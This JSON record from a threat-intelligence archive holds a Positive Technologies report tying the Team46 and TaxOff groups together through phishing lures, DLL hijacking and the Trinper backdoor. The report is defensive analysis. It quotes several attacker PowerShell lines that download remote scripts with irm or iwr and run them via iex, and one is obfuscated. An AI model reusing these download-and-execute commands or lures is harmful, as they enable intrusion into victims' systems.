{
	"id": "ee5ee2db-f6c1-4c7a-aea5-e5bdae6ae27b",
	"created_at": "2026-04-06T00:15:51.397611Z",
	"updated_at": "2026-04-10T13:11:28.01361Z",
	"deleted_at": null,
	"sha1_hash": "bb9adfde4b396310a8b402b33c22a8741fa47d09",
	"title": "Team46 and TaxOff: two sides of the same coin",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 849455,
	"plain_text": "Team46 and TaxOff: two sides of the same coin\r\nBy Positive Technologies\r\nPublished: 2025-06-16 · Archived: 2026-04-05 14:23:20 UTC\r\nThe attack that caught the attention of experts occurred in mid-March 2025. The initial attack vector was\r\na phishing email containing a malicious link. When the victim clicked the link, it triggered a one-click exploit\r\n(CVE-2025-2783), leading to the installation of the Trinper backdoor employed by TaxOff. The phishing email\r\nwas disguised as an invitation to the Primakov Readings forum and the link led to a fake website hosting\r\nthe exploit. The text of the email can be found in the Kaspersky report.\r\nDuring the investigation of that attack, another attack, dating back to October 2024, was discovered, which also\r\nbegan with a phishing campaign. The malicious emails contained an invitation to participate in an international\r\nconference called \"Security of the Union State in the modern world.\"\r\nFigure 1. Decoy document used in the October 2024 attack\r\nThe email structure and style are very similar to those observed in the March 2025 attack.\r\nThe October 2024 email contains the following link: https://mil-by[.]info/#/i?id=[REDACTED]. Clicking\r\nthe link downloads an archive with a shortcut that launches powershell.exe with this command:\r\n-w minimized -c irm https://ms-appdata-query.global.ssl.fastly.net/query.php?id=[REDACTED] | iex\r\nEarlier, we saw a similar command in Team46 attacks:\r\n-w Minimized -ep Bypass -nop -c \"irm https://infosecteam.info/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu | i\r\nThe PowerShell script downloaded after the execution of the command is also similar to one of the scripts used\r\nby Team46. Here is how the downloaded script looks like:\r\nhttps://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin\r\nPage 1 of 4\n\npowershell.exe -w minimized -ep bypass -noni -nop -c Invoke-Expression $([char](10+0x18+0x2)+[char](100)+[char]\r\n[REDACTED]\r\nAfter deobfuscation, the script appears as follows:\r\niwr 'https://ms-appdata-fonts.global.ssl.fastly.net/docs/minsk2025v1/[REDACTED]/document.pdf' -OutFile $env:LOC\r\nFor comparison, here is a similar script found in a Team46 attack:\r\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -w Minimized -ep Bypass -nop -c \"iwr 'https://srv4801\r\nAs you can see, the same pattern is used to name the decoy document on the victim's computer (umawbfez-bkw5-\r\nf85a-3idl-3z4ql69v8it0.pdf and 399ha122-tt9d-6f14-s9li-lqw7di42c792.pdf). In both cases, the Edge User-Agent is used when downloading the decoy document, and the Yandex Browser User-Agent is used when\r\ndownloading the payload. Moreover, in both cases, the computer name is passed via the query parameter.\r\nThe only real difference between those two cases is payload. The earlier attack, as described by Dr.Web, exploited\r\na DLL hijacking vulnerability in Yandex Browser (CVE-2024-6473), with the adversaries replacing\r\nthe legitimate Wldp.dll library to launch the malicious payload. In the October 2024 attack, the adversaries\r\nexploited the rdpclip.exe system component, which is also vulnerable to DLL hijacking, and replaced\r\nthe winsta.dll system library.\r\nInterestingly, winsta.dll serves as a loader for the Trinper backdoor employed by the TaxOff group, which\r\nwe described earlier. The backdoor used the common-rdp-front.global.ssl.fastly.net C2 server.\r\nThis could be dismissed as a coincidence if it weren't for a similar attack recorded in September 2024.\r\nThe phishing emails sent out by the attackers contained an archive called Корпоративного Центра\r\nПАО «Ростелеком».zip, which included a shortcut called Ростелеком.pdf.lnk that launched powershell.exe\r\nwith a command typical for Team46:\r\n-w hid -ep Bypass -nop -c \"irm https://srv510786.hstgr.cloud/ordinary.php?id=9826fbb409f65dc6b068b085551bf4f3\r\nThe decoy document used in the attack was disguised as a message from Rostelecom, Russia's largest digital\r\nservice provider, notifying of upcoming maintenance outages.\r\nhttps://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin\r\nPage 2 of 4\n\nFigure 2. Decoy document used in the September 2024 attack\r\nThe phone number at the end of the message is in the Team46 style (which we discussed in our earlier article):\r\nit is incorrect and consists of a random sequence of digits. \r\nThe payload in this attack was the AdobeARM.exe file, which happens to be a loader for the backdoor used\r\nin the first known Team46 attack described by Dr.Web. In fact, when analyzing one of the incidents,\r\nhttps://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin\r\nPage 3 of 4\n\nwe discovered this backdoor, also dubbed AdobeARM.exe, on a system with the Trinper backdoor.\r\nSource: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin\r\nhttps://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin"
	],
	"report_names": [
		"team46-and-taxoff-two-sides-of-the-same-coin"
	],
	"threat_actors": [
		{
			"id": "17e10d0c-1e0d-46ae-b618-e38257652da1",
			"created_at": "2026-02-04T02:00:03.706015Z",
			"updated_at": "2026-04-10T02:00:03.949251Z",
			"deleted_at": null,
			"main_name": "Team46",
			"aliases": [
				"TaxOff"
			],
			"source_name": "MISPGALAXY:Team46",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434551,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb9adfde4b396310a8b402b33c22a8741fa47d09.pdf",
		"text": "https://archive.orkl.eu/bb9adfde4b396310a8b402b33c22a8741fa47d09.txt",
		"img": "https://archive.orkl.eu/bb9adfde4b396310a8b402b33c22a8741fa47d09.jpg"
	}
}